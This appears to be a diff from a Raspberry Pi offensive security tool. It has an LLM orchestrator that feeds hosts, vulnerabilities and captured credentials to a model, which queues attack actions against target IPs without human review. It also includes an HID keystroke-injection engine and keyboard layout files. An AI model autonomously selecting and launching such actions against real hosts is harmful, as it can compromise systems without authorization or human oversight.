|
||||
system=system,
|
||||
tools=tools,
|
||||
max_tokens=1000,
|
||||
timeout=90,
|
||||
)
|
||||
|
||||
# ------ Path B: snapshot + JSON parsing (LaRuche / Ollama) ------
|
||||
|
||||
def _cycle_without_tools(self, bridge, allowed: List[str], max_act: int) -> Optional[str]:
|
||||
"""
|
||||
No tool-calling: inject state snapshot into prompt, ask LLM for JSON actions.
|
||||
Parse the response and queue actions ourselves.
|
||||
"""
|
||||
snapshot = self._build_snapshot()
|
||||
allowed_str = ", ".join(allowed) if allowed else "none"
|
||||
|
||||
# Extract the real IP list so we can stress it in the prompt
|
||||
real_ips = snapshot.get("VALID_TARGET_IPS", [])
|
||||
ip_list_str = ", ".join(real_ips) if real_ips else "(no hosts discovered yet)"
|
||||
|
||||
# Short system prompt - small models forget long instructions
|
||||
system = (
|
||||
"You are a network security orchestrator. "
|
||||
"You receive network scan data and output a JSON array of actions. "
|
||||
"Output ONLY a JSON array. No explanations, no markdown, no commentary."
|
||||
)
|
||||
|
||||
# Put the real instructions in the user message AFTER the data,
|
||||
# so the model sees them last (recency bias helps small models).
|
||||
prompt = (
|
||||
f"Network state:\n{json.dumps(snapshot, indent=2)}\n\n"
|
||||
"---\n"
|
||||
f"Pick up to {max_act} actions from: {allowed_str}\n"
|
||||
f"Target IPs MUST be from this list: {ip_list_str}\n"
|
||||
"Match actions to open ports. Skip hosts already in pending_queue.\n"
|
||||
"Output ONLY a JSON array like:\n"
|
||||
'[{"action":"ActionName","target_ip":"1.2.3.4","reason":"brief"}]\n'
|
||||
"or [] if nothing needed.\n"
|
||||
"JSON array:"
|
||||
)
|
||||
|
||||
# Use an assistant prefix to force the model into JSON mode.
|
||||
# Many LLMs will continue from this prefix rather than describe.
|
||||
messages = [
|
||||
{"role": "user", "content": prompt},
|
||||
{"role": "assistant", "content": "["},
|
||||
]
|
||||
|
||||
raw = bridge.complete(
|
||||
messages,
|
||||
system=system,
|
||||
max_tokens=500,
|
||||
timeout=60,
|
||||
)
|
||||
|
||||
# Prepend the '[' prefix we forced if the model didn't include it
|
||||
if raw and not raw.strip().startswith("["):
|
||||
raw = "[" + raw
|
||||
|
||||
if not raw:
|
||||
return None
|
||||
|
||||
# Parse and queue actions
|
||||
queued = self._parse_and_queue_actions(raw, allowed, max_act)
|
||||
|
||||
summary = raw.strip()
|
||||
if queued:
|
||||
summary += f"\n\n[Orchestrator queued {len(queued)} action(s): {', '.join(queued)}]"
|
||||
else:
|
||||
summary += "\n\n[Orchestrator: no valid actions parsed from LLM response]"
|
||||
|
||||
return summary
|
||||
|
||||
@staticmethod
|
||||
def _is_valid_ip(ip: str) -> bool:
|
||||
"""Check that ip is a real IPv4 address (no placeholders like 192.168.1.x)."""
|
||||
parts = ip.split(".")
|
||||
if len(parts) != 4:
|
||||
return False
|
||||
for p in parts:
|
||||
try:
|
||||
n = int(p)
|
||||
if n < 0 or n > 255:
|
||||
return False
|
||||
except ValueError:
|
||||
return False # catches 'x', 'xx', etc.
|
||||
return True
|
||||
|
||||
def _parse_and_queue_actions(self, raw: str, allowed: List[str], max_act: int) -> List[str]:
|
||||
"""Parse JSON array from LLM response and queue valid actions. Returns list of queued action names."""
|
||||
queued = []
|
||||
try:
|
||||
text = raw.strip()
|
||||
# Strip markdown fences
|
||||
if "```" in text:
|
||||
parts = text.split("```")
|
||||
text = parts[1] if len(parts) > 1 else parts[0]
|
||||
if text.startswith("json"):
|
||||
text = text[4:]
|
||||
text = text.strip()
|
||||
|
||||
# Try to find JSON array in the text
|
||||
start = text.find("[")
|
||||
end = text.rfind("]")
|
||||
if start == -1 or end == -1:
|
||||
# Check if the model wrote a text description instead of JSON
|
||||
if any(text.lower().startswith(w) for w in ("this ", "here", "the ", "based", "from ", "i ")):
|
||||
logger.warning(
|
||||
"LLM autonomous: model returned a text description instead of JSON array. "
|
||||
"The model may not support structured output. First 120 chars: "
|
||||
+ text[:120]
|
||||
)
|
||||
else:
|
||||
logger.debug(f"LLM autonomous: no JSON array found in response: {text[:120]}")
|
||||
return []
|
||||
|
||||
data = json.loads(text[start:end + 1])
|
||||
if not isinstance(data, list):
|
||||
data = [data]
|
||||
|
||||
for item in data[:max_act]:
|
||||
if not isinstance(item, dict):
|
||||
continue
|
||||
action = item.get("action", "").strip()
|
||||
target_ip = str(item.get("target_ip", "")).strip()
|
||||
reason = str(item.get("reason", "llm_autonomous"))[:120]
|
||||
|
||||
if not action or action not in allowed:
|
||||
logger.debug(f"LLM autonomous: skipping invalid/disallowed action '{action}'")
|
||||
continue
|
||||
if not target_ip:
|
||||
logger.debug(f"LLM autonomous: skipping '{action}' - no target_ip")
|
||||
continue
|
||||
if not self._is_valid_ip(target_ip):
|
||||
logger.warning(
|
||||
f"LLM autonomous: skipping '{action}' - invalid/placeholder IP '{target_ip}' "
|
||||
f"(LLM must use exact IPs from alive_hosts)"
|
||||
)
|
||||
continue
|
||||
|
||||
mac = self._resolve_mac(target_ip)
|
||||
if not mac:
|
||||
logger.warning(
|
||||
f"LLM autonomous: skipping '{action}' @ {target_ip} - "
|
||||
f"IP not found in hosts table (LLM used an IP not in alive_hosts)"
|
||||
)
|
||||
continue
|
||||
|
||||
self._sd.db.queue_action(
|
||||
action_name=action,
|
||||
mac=mac,
|
||||
ip=target_ip,
|
||||
priority=_AUTONOMOUS_PRIORITY,
|
||||
trigger="llm_autonomous",
|
||||
metadata={
|
||||
"decision_method": "llm_autonomous",
|
||||
"decision_origin": "llm",
|
||||
"ai_reason": reason,
|
||||
},
|
||||
)
|
||||
queued.append(f"{action}@{target_ip}")
|
||||
logger.info(f"[LLM_AUTONOMOUS] → {action} @ {target_ip} (mac={mac}): {reason}")
|
||||
|
||||
if queued:
|
||||
try:
|
||||
self._sd.queue_event.set()
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
except json.JSONDecodeError as e:
|
||||
logger.debug(f"LLM autonomous: JSON parse error: {e} - raw: {raw[:200]}")
|
||||
except Exception as e:
|
||||
logger.debug(f"LLM autonomous: action queue error: {e}")
|
||||
|
||||
return queued
|
||||
|
||||
def _build_autonomous_system_prompt(self, allowed: List[str], max_act: int) -> str:
|
||||
try:
|
||||
hosts = getattr(self._sd, "target_count", "?")
|
||||
vulns = getattr(self._sd, "vuln_count", "?")
|
||||
creds = getattr(self._sd, "cred_count", "?")
|
||||
mode = getattr(self._sd, "operation_mode", "?")
|
||||
except Exception:
|
||||
hosts = vulns = creds = mode = "?"
|
||||
|
||||
allowed_str = ", ".join(allowed) if allowed else "none"
|
||||
|
||||
lang = ""
|
||||
try:
|
||||
from llm_bridge import LLMBridge
|
||||
lang = LLMBridge()._lang_instruction()
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
return (
|
||||
"You are Bjorn's Cyberviking autonomous orchestrator, running on a Raspberry Pi network security tool. "
|
||||
f"Current state: {hosts} hosts discovered, {vulns} vulnerabilities, {creds} credentials. "
|
||||
f"Operation mode: {mode}. "
|
||||
"Your objective: observe the network state via tools, then queue the most valuable actions. "
|
||||
f"Hard limit: at most {max_act} run_action calls per cycle. "
|
||||
f"Only these action names may be queued: {allowed_str}. "
|
||||
"Strategy: prioritise unexplored services, hosts with high port counts, and hosts with no recent scans. "
|
||||
"Do not queue duplicate actions already pending or recently successful. "
|
||||
"Use Norse references occasionally. Be terse and tactical."
|
||||
+ (f" {lang}" if lang else "")
|
||||
)
|
||||
|
||||
# ------------------------------------------------------------------
|
||||
# Shared helpers
|
||||
# ------------------------------------------------------------------
|
||||
|
||||
def _push_to_chat(self, bridge, user_prompt: str, assistant_response: str) -> None:
|
||||
"""
|
||||
Inject the LLM's reasoning into the 'llm_orchestrator' chat session
|
||||
so it can be reviewed in chat.html (load session 'llm_orchestrator').
|
||||
Keeps last 40 messages to avoid unbounded memory.
|
||||
"""
|
||||
try:
|
||||
with bridge._hist_lock:
|
||||
hist = bridge._chat_histories.setdefault("llm_orchestrator", [])
|
||||
hist.append({"role": "user", "content": f"[Autonomous cycle]\n{user_prompt}"})
|
||||
hist.append({"role": "assistant", "content": assistant_response})
|
||||
if len(hist) > 40:
|
||||
hist[:] = hist[-40:]
|
||||
except Exception as e:
|
||||
logger.debug(f"LLM reasoning push to chat failed: {e}")
|
||||
|
||||
def _resolve_mac(self, ip: str) -> str:
|
||||
"""Resolve IP → MAC from hosts table. Column is 'ips' (may hold multiple IPs)."""
|
||||
if not ip:
|
||||
return ""
|
||||
try:
|
||||
row = self._sd.db.query_one(
|
||||
"SELECT mac_address FROM hosts WHERE ips LIKE ? LIMIT 1", (f"%{ip}%",)
|
||||
)
|
||||
return row["mac_address"] if row else ""
|
||||
except Exception:
|
||||
return ""
|
||||
|
||||
def _build_snapshot(self) -> Dict[str, Any]:
|
||||
"""
|
||||
Rich state snapshot for advisor / autonomous prompts.
|
||||
|
||||
Includes:
|
||||
- alive_hosts : full host details (ip, mac, hostname, vendor, ports)
|
||||
- services : identified services per host (port, service, product, version)
|
||||
- vulns_found : active vulnerabilities per host
|
||||
- creds_found : captured credentials per host/service
|
||||
- available_actions : what the LLM can queue (name, description, target port/service)
|
||||
- pending_queue : actions already queued
|
||||
- recent_actions: last completed actions (avoid repeats)
|
||||
"""
|
||||
hosts, services, vulns, creds = [], [], [], []
|
||||
actions_catalog, pending, history = [], [], []
|
||||
|
||||
# ── Alive hosts ──
|
||||
try:
|
||||
rows = self._sd.db.query(
|
||||
"SELECT mac_address, ips, hostnames, ports, vendor "
|
||||
"FROM hosts WHERE alive=1 LIMIT 30"
|
||||
)
|
||||
for r in (rows or []):
|
||||
ip = (r.get("ips") or "").split(";")[0].strip()
|
||||
if not ip:
|
||||
continue
|
||||
hosts.append({
|
||||
"ip": ip,
|
||||
"mac": r.get("mac_address", ""),
|
||||
"hostname": (r.get("hostnames") or "").split(";")[0].strip(),
|
||||
"vendor": r.get("vendor", ""),
|
||||
"ports": r.get("ports", ""),
|
||||
})
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# ── Port services (identified services with product/version) ──
|
||||
try:
|
||||
rows = self._sd.db.query(
|
||||
"SELECT mac_address, ip, port, service, product, version "
|
||||
"FROM port_services WHERE is_current=1 AND state='open' "
|
||||
"ORDER BY mac_address, port LIMIT 100"
|
||||
)
|
||||
for r in (rows or []):
|
||||
svc = {"mac": r.get("mac_address", ""), "port": r.get("port")}
|
||||
if r.get("ip"):
|
||||
svc["ip"] = r["ip"]
|
||||
if r.get("service"):
|
||||
svc["service"] = r["service"]
|
||||
if r.get("product"):
|
||||
svc["product"] = r["product"]
|
||||
if r.get("version"):
|
||||
svc["version"] = r["version"]
|
||||
services.append(svc)
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# ── Active vulnerabilities ──
|
||||
try:
|
||||
rows = self._sd.db.query(
|
||||
"SELECT ip, port, vuln_id, hostname "
|
||||
"FROM vulnerabilities WHERE is_active=1 LIMIT 30"
|
||||
)
|
||||
vulns = [{"ip": r.get("ip", ""), "port": r.get("port"),
|
||||
"vuln_id": r.get("vuln_id", ""),
|
||||
"hostname": r.get("hostname", "")}
|
||||
for r in (rows or [])]
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# ── Captured credentials ──
|
||||
try:
|
||||
rows = self._sd.db.query(
|
||||
"SELECT service, ip, hostname, port, \"user\" "
|
||||
"FROM creds LIMIT 30"
|
||||
)
|
||||
creds = [{"service": r.get("service", ""), "ip": r.get("ip", ""),
|
||||
"hostname": r.get("hostname", ""), "port": r.get("port"),
|
||||
"user": r.get("user", "")}
|
||||
for r in (rows or [])]
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# ── Available actions catalog (what the LLM can queue) ──
|
||||
allowed = self._allowed_actions()
|
||||
try:
|
||||
if allowed:
|
||||
placeholders = ",".join("?" * len(allowed))
|
||||
rows = self._sd.db.query(
|
||||
f"SELECT b_class, b_description, b_port, b_service "
|
||||
f"FROM actions WHERE b_class IN ({placeholders}) AND b_enabled=1",
|
||||
tuple(allowed)
|
||||
)
|
||||
for r in (rows or []):
|
||||
entry = {"name": r["b_class"]}
|
||||
if r.get("b_description"):
|
||||
entry["description"] = r["b_description"][:100]
|
||||
if r.get("b_port"):
|
||||
entry["target_port"] = r["b_port"]
|
||||
if r.get("b_service"):
|
||||
entry["target_service"] = r["b_service"]
|
||||
actions_catalog.append(entry)
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# ── Pending queue ──
|
||||
try:
|
||||
rows = self._sd.db.query(
|
||||
"SELECT action_name, ip, priority FROM action_queue "
|
||||
"WHERE status='pending' ORDER BY priority DESC LIMIT 15"
|
||||
)
|
||||
pending = [{"action": r["action_name"], "ip": r["ip"]} for r in (rows or [])]
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# ── Recent action history ──
|
||||
try:
|
||||
rows = self._sd.db.query(
|
||||
"SELECT action_name, ip, status FROM action_queue "
|
||||
"WHERE status IN ('success','failed') ORDER BY completed_at DESC LIMIT 15"
|
||||
)
|
||||
history = [{"action": r["action_name"], "ip": r["ip"], "result": r["status"]}
|
||||
for r in (rows or [])]
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# Build explicit IP list for emphasis
|
||||
ip_list = [h["ip"] for h in hosts if h.get("ip")]
|
||||
|
||||
result = {
|
||||
"VALID_TARGET_IPS": ip_list,
|
||||
"hosts_alive": hosts,
|
||||
"operation_mode": getattr(self._sd, "operation_mode", "?"),
|
||||
}
|
||||
if services:
|
||||
result["services_detected"] = services
|
||||
if vulns:
|
||||
result["vulnerabilities_found"] = vulns
|
||||
if creds:
|
||||
result["credentials_captured"] = creds
|
||||
if actions_catalog:
|
||||
result["available_actions"] = actions_catalog
|
||||
result["pending_queue"] = pending
|
||||
result["recent_actions"] = history
|
||||
result["summary"] = {
|
||||
"hosts_alive": len(ip_list),
|
||||
"vulns": getattr(self._sd, "vuln_count", 0),
|
||||
"creds": getattr(self._sd, "cred_count", 0),
|
||||
}
|
||||
|
||||
return result
|
||||
@@ -1,4 +1,5 @@
|
||||
# logger.py
|
||||
"""logger.py - Rotating file + console logger with custom SUCCESS level."""
|
||||
|
||||
import logging
|
||||
import os
|
||||
import threading
|
||||
|
||||
@@ -1,21 +1,6 @@
|
||||
"""
|
||||
Loki — HID Attack Engine for Bjorn.
|
||||
"""__init__.py - Loki HID attack engine for Bjorn.
|
||||
|
||||
Manages USB HID gadget lifecycle, script execution, and job tracking.
|
||||
Named after the Norse trickster god.
|
||||
|
||||
Loki is the 5th exclusive operation mode (alongside MANUAL, AUTO, AI, BIFROST).
|
||||
When active, the orchestrator stops and the Pi acts as a keyboard/mouse
|
||||
to the connected host via /dev/hidg0 (keyboard) and /dev/hidg1 (mouse).
|
||||
|
||||
HID GADGET STRATEGY:
|
||||
The HID functions (keyboard + mouse) are created ONCE at boot time alongside
|
||||
RNDIS networking by the usb-gadget.sh script. This avoids the impossible task
|
||||
of hot-adding HID functions to a running composite gadget (UDC rebind fails
|
||||
with EIO when RNDIS is active).
|
||||
|
||||
LokiEngine simply opens/closes the /dev/hidg0 and /dev/hidg1 device files.
|
||||
If /dev/hidg0 doesn't exist, the user needs to run the setup once and reboot.
|
||||
Manages USB HID gadget lifecycle, HIDScript execution, and job tracking.
|
||||
"""
|
||||
import os
|
||||
import time
|
||||
@@ -27,7 +12,7 @@ from logger import Logger
|
||||
|
||||
logger = Logger(name="loki", level=logging.DEBUG)
|
||||
|
||||
# USB HID report descriptors — EXACT byte-for-byte copies from P4wnP1_aloa
|
||||
# USB HID report descriptors - EXACT byte-for-byte copies from P4wnP1_aloa
|
||||
# Source: P4wnP1_aloa-master/service/SubSysUSB.go lines 54-70
|
||||
#
|
||||
# These are written to the gadget at boot time by usb-gadget.sh.
|
||||
@@ -64,7 +49,7 @@ _MOUSE_REPORT_DESC = bytes([
|
||||
# The boot script that creates RNDIS + HID functions at startup.
|
||||
# This replaces /usr/local/bin/usb-gadget.sh
|
||||
_USB_GADGET_SCRIPT = '''#!/bin/bash
|
||||
# usb-gadget.sh — USB composite gadget: RNDIS networking + HID (keyboard/mouse)
|
||||
# usb-gadget.sh - USB composite gadget: RNDIS networking + HID (keyboard/mouse)
|
||||
# Auto-generated by Bjorn Loki. Do not edit manually.
|
||||
|
||||
modprobe libcomposite
|
||||
@@ -196,7 +181,7 @@ _GADGET_SCRIPT_PATH = "/usr/local/bin/usb-gadget.sh"
|
||||
|
||||
|
||||
class LokiEngine:
|
||||
"""HID attack engine — manages script execution and job tracking.
|
||||
"""HID attack engine - manages script execution and job tracking.
|
||||
|
||||
The USB HID gadget (keyboard + mouse) is set up at boot time by
|
||||
usb-gadget.sh. This engine simply opens /dev/hidg0 and /dev/hidg1.
|
||||
@@ -242,7 +227,7 @@ class LokiEngine:
|
||||
# Check if HID gadget is available (set up at boot)
|
||||
if not os.path.exists("/dev/hidg0"):
|
||||
logger.error(
|
||||
"/dev/hidg0 not found — HID gadget not configured at boot. "
|
||||
"/dev/hidg0 not found - HID gadget not configured at boot. "
|
||||
"Run install_hid_gadget() from the Loki API and reboot."
|
||||
)
|
||||
self._gadget_ready = False
|
||||
@@ -287,7 +272,7 @@ class LokiEngine:
|
||||
if job["status"] == "running":
|
||||
self._jobs.cancel_job(job["id"])
|
||||
|
||||
# Close HID devices (don't remove gadget — it persists)
|
||||
# Close HID devices (don't remove gadget - it persists)
|
||||
if self._hid:
|
||||
self._hid.close()
|
||||
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
"""
|
||||
Low-level USB HID controller for Loki.
|
||||
"""hid_controller.py - Low-level USB HID controller for Loki.
|
||||
|
||||
Writes keyboard and mouse reports to /dev/hidg0 and /dev/hidg1.
|
||||
"""
|
||||
import os
|
||||
@@ -16,7 +16,7 @@ from loki.layouts import load as load_layout
|
||||
logger = Logger(name="loki.hid_controller", level=logging.DEBUG)
|
||||
|
||||
# ── HID Keycodes ──────────────────────────────────────────────
|
||||
# USB HID Usage Tables — Keyboard/Keypad Page (0x07)
|
||||
# USB HID Usage Tables - Keyboard/Keypad Page (0x07)
|
||||
|
||||
KEY_NONE = 0x00
|
||||
KEY_A = 0x04
|
||||
|
||||
@@ -1,17 +1,6 @@
|
||||
"""
|
||||
HIDScript parser and executor for Loki.
|
||||
"""hidscript.py - P4wnP1-compatible HIDScript parser and executor.
|
||||
|
||||
Supports P4wnP1-compatible HIDScript syntax:
|
||||
- Function calls: type("hello"); press("GUI r"); delay(500);
|
||||
- var declarations: var x = 1;
|
||||
- for / while loops
|
||||
- if / else conditionals
|
||||
- // and /* */ comments
|
||||
- String concatenation with +
|
||||
- Basic arithmetic (+, -, *, /)
|
||||
- console.log() for job output
|
||||
|
||||
Zero external dependencies — pure Python DSL parser.
|
||||
Pure Python DSL parser supporting type/press/delay, loops, conditionals, and variables.
|
||||
"""
|
||||
import re
|
||||
import time
|
||||
@@ -240,7 +229,7 @@ class HIDScriptParser:
|
||||
else_body = source[after_else+1:eb_end]
|
||||
next_pos = eb_end + 1
|
||||
elif source[after_else:after_else+2] == 'if':
|
||||
# else if — parse recursively
|
||||
# else if - parse recursively
|
||||
inner_if, next_pos = self._parse_if(source, after_else)
|
||||
else_body = inner_if # will be a dict, handle in exec
|
||||
else:
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
"""
|
||||
Loki job manager — tracks HIDScript execution jobs.
|
||||
"""jobs.py - Loki job manager, tracks HIDScript execution jobs.
|
||||
|
||||
Each job runs in its own daemon thread.
|
||||
"""
|
||||
import uuid
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
"""
|
||||
Keyboard layout loader for Loki HID subsystem.
|
||||
"""__init__.py - Keyboard layout loader for Loki HID subsystem.
|
||||
|
||||
Caches loaded layouts in memory.
|
||||
"""
|
||||
import json
|
||||
|
||||
422
loki/layouts/de.json
Normal file
422
loki/layouts/de.json
Normal file
@@ -0,0 +1,422 @@
|
||||
{
|
||||
"a": [
|
||||
0,
|
||||
4
|
||||
],
|
||||
"b": [
|
||||
0,
|
||||
5
|
||||
],
|
||||
"c": [
|
||||
0,
|
||||
6
|
||||
],
|
||||
"d": [
|
||||
0,
|
||||
7
|
||||
],
|
||||
"e": [
|
||||
0,
|
||||
8
|
||||
],
|
||||
"f": [
|
||||
0,
|
||||
9
|
||||
],
|
||||
"g": [
|
||||
0,
|
||||
10
|
||||
],
|
||||
"h": [
|
||||
0,
|
||||
11
|
||||
],
|
||||
"i": [
|
||||
0,
|
||||
12
|
||||
],
|
||||
"j": [
|
||||
0,
|
||||
13
|
||||
],
|
||||
"k": [
|
||||
0,
|
||||
14
|
||||
],
|
||||
"l": [
|
||||
0,
|
||||
15
|
||||
],
|
||||
"m": [
|
||||
0,
|
||||
16
|
||||
],
|
||||
"n": [
|
||||
0,
|
||||
17
|
||||
],
|
||||
"o": [
|
||||
0,
|
||||
18
|
||||
],
|
||||
"p": [
|
||||
0,
|
||||
19
|
||||
],
|
||||
"q": [
|
||||
0,
|
||||
20
|
||||
],
|
||||
"r": [
|
||||
0,
|
||||
21
|
||||
],
|
||||
"s": [
|
||||
0,
|
||||
22
|
||||
],
|
||||
"t": [
|
||||
0,
|
||||
23
|
||||
],
|
||||
"u": [
|
||||
0,
|
||||
24
|
||||
],
|
||||
"v": [
|
||||
0,
|
||||
25
|
||||
],
|
||||
"w": [
|
||||
0,
|
||||
26
|
||||
],
|
||||
"x": [
|
||||
0,
|
||||
27
|
||||
],
|
||||
"y": [
|
||||
0,
|
||||
29
|
||||
],
|
||||
"z": [
|
||||
0,
|
||||
28
|
||||
],
|
||||
"A": [
|
||||
2,
|
||||
4
|
||||
],
|
||||
"B": [
|
||||
2,
|
||||
5
|
||||
],
|
||||
"C": [
|
||||
2,
|
||||
6
|
||||
],
|
||||
"D": [
|
||||
2,
|
||||
7
|
||||
],
|
||||
"E": [
|
||||
2,
|
||||
8
|
||||
],
|
||||
"F": [
|
||||
2,
|
||||
9
|
||||
],
|
||||
"G": [
|
||||
2,
|
||||
10
|
||||
],
|
||||
"H": [
|
||||
2,
|
||||
11
|
||||
],
|
||||
"I": [
|
||||
2,
|
||||
12
|
||||
],
|
||||
"J": [
|
||||
2,
|
||||
13
|
||||
],
|
||||
"K": [
|
||||
2,
|
||||
14
|
||||
],
|
||||
"L": [
|
||||
2,
|
||||
15
|
||||
],
|
||||
"M": [
|
||||
2,
|
||||
16
|
||||
],
|
||||
"N": [
|
||||
2,
|
||||
17
|
||||
],
|
||||
"O": [
|
||||
2,
|
||||
18
|
||||
],
|
||||
"P": [
|
||||
2,
|
||||
19
|
||||
],
|
||||
"Q": [
|
||||
2,
|
||||
20
|
||||
],
|
||||
"R": [
|
||||
2,
|
||||
21
|
||||
],
|
||||
"S": [
|
||||
2,
|
||||
22
|
||||
],
|
||||
"T": [
|
||||
2,
|
||||
23
|
||||
],
|
||||
"U": [
|
||||
2,
|
||||
24
|
||||
],
|
||||
"V": [
|
||||
2,
|
||||
25
|
||||
],
|
||||
"W": [
|
||||
2,
|
||||
26
|
||||
],
|
||||
"X": [
|
||||
2,
|
||||
27
|
||||
],
|
||||
"Y": [
|
||||
2,
|
||||
29
|
||||
],
|
||||
"Z": [
|
||||
2,
|
||||
28
|
||||
],
|
||||
"1": [
|
||||
0,
|
||||
30
|
||||
],
|
||||
"2": [
|
||||
0,
|
||||
31
|
||||
],
|
||||
"3": [
|
||||
0,
|
||||
32
|
||||
],
|
||||
"4": [
|
||||
0,
|
||||
33
|
||||
],
|
||||
"5": [
|
||||
0,
|
||||
34
|
||||
],
|
||||
"6": [
|
||||
0,
|
||||
35
|
||||
],
|
||||
"7": [
|
||||
0,
|
||||
36
|
||||
],
|
||||
"8": [
|
||||
0,
|
||||
37
|
||||
],
|
||||
"9": [
|
||||
0,
|
||||
38
|
||||
],
|
||||
"0": [
|
||||
0,
|
||||
39
|
||||
],
|
||||
"!": [
|
||||
2,
|
||||
30
|
||||
],
|
||||
"@": [
|
||||
2,
|
||||
31
|
||||
],
|
||||
"#": [
|
||||
0,
|
||||
49
|
||||
],
|
||||
"$": [
|
||||
2,
|
||||
33
|
||||
],
|
||||
"%": [
|
||||
2,
|
||||
34
|
||||
],
|
||||
"^": [
|
||||
2,
|
||||
35
|
||||
],
|
||||
"&": [
|
||||
2,
|
||||
35
|
||||
],
|
||||
"*": [
|
||||
2,
|
||||
48
|
||||
],
|
||||
"(": [
|
||||
2,
|
||||
37
|
||||
],
|
||||
")": [
|
||||
2,
|
||||
38
|
||||
],
|
||||
"\n": [
|
||||
0,
|
||||
40
|
||||
],
|
||||
"\r": [
|
||||
0,
|
||||
40
|
||||
],
|
||||
"\t": [
|
||||
0,
|
||||
43
|
||||
],
|
||||
" ": [
|
||||
0,
|
||||
44
|
||||
],
|
||||
"-": [
|
||||
0,
|
||||
45
|
||||
],
|
||||
"_": [
|
||||
2,
|
||||
45
|
||||
],
|
||||
"=": [
|
||||
2,
|
||||
39
|
||||
],
|
||||
"+": [
|
||||
0,
|
||||
48
|
||||
],
|
||||
"[": [
|
||||
0,
|
||||
47
|
||||
],
|
||||
"{": [
|
||||
2,
|
||||
47
|
||||
],
|
||||
"]": [
|
||||
0,
|
||||
48
|
||||
],
|
||||
"}": [
|
||||
2,
|
||||
48
|
||||
],
|
||||
"\\": [
|
||||
0,
|
||||
49
|
||||
],
|
||||
"|": [
|
||||
2,
|
||||
49
|
||||
],
|
||||
";": [
|
||||
0,
|
||||
51
|
||||
],
|
||||
":": [
|
||||
2,
|
||||
51
|
||||
],
|
||||
"'": [
|
||||
2,
|
||||
49
|
||||
],
|
||||
"\"": [
|
||||
2,
|
||||
52
|
||||
],
|
||||
"`": [
|
||||
0,
|
||||
53
|
||||
],
|
||||
"~": [
|
||||
2,
|
||||
53
|
||||
],
|
||||
",": [
|
||||
0,
|
||||
54
|
||||
],
|
||||
"<": [
|
||||
0,
|
||||
100
|
||||
],
|
||||
".": [
|
||||
0,
|
||||
55
|
||||
],
|
||||
">": [
|
||||
2,
|
||||
100
|
||||
],
|
||||
"/": [
|
||||
2,
|
||||
36
|
||||
],
|
||||
"?": [
|
||||
2,
|
||||
45
|
||||
],
|
||||
"ß": [
|
||||
0,
|
||||
45
|
||||
],
|
||||
"ü": [
|
||||
0,
|
||||
47
|
||||
],
|
||||
"Ü": [
|
||||
2,
|
||||
47
|
||||
],
|
||||
"ö": [
|
||||
0,
|
||||
51
|
||||
],
|
||||
"Ö": [
|
||||
2,
|
||||
51
|
||||
],
|
||||
"ä": [
|
||||
0,
|
||||
52
|
||||
],
|
||||
"Ä": [
|
||||
2,
|
||||
52
|
||||
]
|
||||
}
|
||||
426
loki/layouts/es.json
Normal file
426
loki/layouts/es.json
Normal file
@@ -0,0 +1,426 @@
|
||||
{
|
||||
"a": [
|
||||
0,
|
||||
4
|
||||
],
|
||||
"b": [
|
||||
0,
|
||||
5
|
||||
],
|
||||
"c": [
|
||||
0,
|
||||
6
|
||||
],
|
||||
"d": [
|
||||
0,
|
||||
7
|
||||
],
|
||||
"e": [
|
||||
0,
|
||||
8
|
||||
],
|
||||
"f": [
|
||||
0,
|
||||
9
|
||||
],
|
||||
"g": [
|
||||
0,
|
||||
10
|
||||
],
|
||||
"h": [
|
||||
0,
|
||||
11
|
||||
],
|
||||
"i": [
|
||||
0,
|
||||
12
|
||||
],
|
||||
"j": [
|
||||
0,
|
||||
13
|
||||
],
|
||||
"k": [
|
||||
0,
|
||||
14
|
||||
],
|
||||
"l": [
|
||||
0,
|
||||
15
|
||||
],
|
||||
"m": [
|
||||
0,
|
||||
16
|
||||
],
|
||||
"n": [
|
||||
0,
|
||||
17
|
||||
],
|
||||
"o": [
|
||||
0,
|
||||
18
|
||||
],
|
||||
"p": [
|
||||
0,
|
||||
19
|
||||
],
|
||||
"q": [
|
||||
0,
|
||||
20
|
||||
],
|
||||
"r": [
|
||||
0,
|
||||
21
|
||||
],
|
||||
"s": [
|
||||
0,
|
||||
22
|
||||
],
|
||||
"t": [
|
||||
0,
|
||||
23
|
||||
],
|
||||
"u": [
|
||||
0,
|
||||
24
|
||||
],
|
||||
"v": [
|
||||
0,
|
||||
25
|
||||
],
|
||||
"w": [
|
||||
0,
|
||||
26
|
||||
],
|
||||
"x": [
|
||||
0,
|
||||
27
|
||||
],
|
||||
"y": [
|
||||
0,
|
||||
28
|
||||
],
|
||||
"z": [
|
||||
0,
|
||||
29
|
||||
],
|
||||
"A": [
|
||||
2,
|
||||
4
|
||||
],
|
||||
"B": [
|
||||
2,
|
||||
5
|
||||
],
|
||||
"C": [
|
||||
2,
|
||||
6
|
||||
],
|
||||
"D": [
|
||||
2,
|
||||
7
|
||||
],
|
||||
"E": [
|
||||
2,
|
||||
8
|
||||
],
|
||||
"F": [
|
||||
2,
|
||||
9
|
||||
],
|
||||
"G": [
|
||||
2,
|
||||
10
|
||||
],
|
||||
"H": [
|
||||
2,
|
||||
11
|
||||
],
|
||||
"I": [
|
||||
2,
|
||||
12
|
||||
],
|
||||
"J": [
|
||||
2,
|
||||
13
|
||||
],
|
||||
"K": [
|
||||
2,
|
||||
14
|
||||
],
|
||||
"L": [
|
||||
2,
|
||||
15
|
||||
],
|
||||
"M": [
|
||||
2,
|
||||
16
|
||||
],
|
||||
"N": [
|
||||
2,
|
||||
17
|
||||
],
|
||||
"O": [
|
||||
2,
|
||||
18
|
||||
],
|
||||
"P": [
|
||||
2,
|
||||
19
|
||||
],
|
||||
"Q": [
|
||||
2,
|
||||
20
|
||||
],
|
||||
"R": [
|
||||
2,
|
||||
21
|
||||
],
|
||||
"S": [
|
||||
2,
|
||||
22
|
||||
],
|
||||
"T": [
|
||||
2,
|
||||
23
|
||||
],
|
||||
"U": [
|
||||
2,
|
||||
24
|
||||
],
|
||||
"V": [
|
||||
2,
|
||||
25
|
||||
],
|
||||
